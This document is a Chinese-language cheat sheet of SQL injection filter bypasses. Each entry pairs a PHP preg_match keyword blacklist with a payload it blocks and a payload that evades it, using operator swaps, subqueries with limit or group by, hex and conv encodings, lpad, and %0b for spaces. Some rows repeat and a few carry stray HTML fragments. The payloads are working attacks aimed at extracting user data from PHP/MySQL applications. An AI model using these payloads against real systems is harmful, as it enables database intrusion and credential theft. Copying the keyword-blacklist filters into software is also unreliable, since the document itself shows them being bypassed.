过滤关键字   and or

php代码   preg_match('/(and|or)/i',$id)

会过滤的攻击代码    1 or 1=1 1 and 1=1

绕过方式    1 || 1=1 1 && 1=1

过滤关键字   and or union

php代码   preg_match('/(and|or|union)/i',$id)

会过滤的攻击代码    union select user,password from users

绕过方式    1 && (select user from users where userid=1)='admin'

过滤关键字   and or union where

php代码   preg_match('/(and|or|union|where)/i',$id)

会过滤的攻击代码    1 && (select user from users where user_id = 1) = 'admin'

绕过方式    1 && (select user from users limit 1) = 'admin'

过滤关键字   and or union where

php代码   preg_match('/(and|or|union|where)/i',$id)

会过滤的攻击代码    1 && (select user from users where user_id = 1) = 'admin'

绕过方式    1 && (select user from users limit 1) = 'admin'

过滤关键字   and, or, union, where, limit

php代码   preg_match('/(and|or|union|where|limit)/i', $id)

会过滤的攻击代码    1 && (select user from users limit 1) = 'admin'

绕过方式    1 && (select user from users group by user_id having user_id = 1) = 'admin'#user_id聚合中user_id为1的user为admin

过滤关键字   and, or, union, where, limit, group by

php代码   preg_match('/(and|or|union|where|limit|group by)/i', $id)

会过滤的攻击代码    1 && (select user from users group by user_id having user_id = 1) = 'admin'

绕过方式    1 && (select substr(group_concat(user_id),1,1) user from users ) = 1

过滤关键字   and, or, union, where, limit, group by, select

php代码   preg_match('/(and|or|union|where|limit|group by|select)/i', $id)

会过滤的攻击代码    1 && (select substr(gruop_concat(user_id),1,1) user from users) = 1

绕过方式    1 && substr(user,1,1) = 'a'

过滤关键字   and, or, union, where, limit, group by, select, '

php代码   preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)

会过滤的攻击代码    1 && (select substr(gruop_concat(user_id),1,1) user from users) = 1

绕过方式    1 && user_id is not null 1 && substr(user,1,1) = 0x61 1 && substr(user,1,1) = unhex(61)

过滤关键字   and, or, union, where, limit, group by, select, ', hex

php代码   preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)

会过滤的攻击代码    1 && substr(user,1,1) = unhex(61)

绕过方式    1 && substr(user,1,1) = lower(conv(11,10,16)) #十进制的11转化为十六进制，并小写。

过滤关键字   and, or, union, where, limit, group by, select, ', hex, substr

php代码   preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)

会过滤的攻击代码    1 && substr(user,1,1) = lower(conv(11,10,16))/td>

绕过方式    1 && lpad(user,7,1)

过滤关键字   and, or, union, where, limit, group by, select, ', hex, substr, 空格

php代码   preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)

会过滤的攻击代码    1 && lpad(user,7,1)/td>

绕过方式    1%0b||%0blpad(user,7,1)

过滤关键字   and or union where

php代码   preg_match('/(and|or|union|where)/i',$id)

会过滤的攻击代码    1 || (select user from users where user_id = 1) = 'admin'

绕过方式    1 || (select user from users limit 1) = 'admin'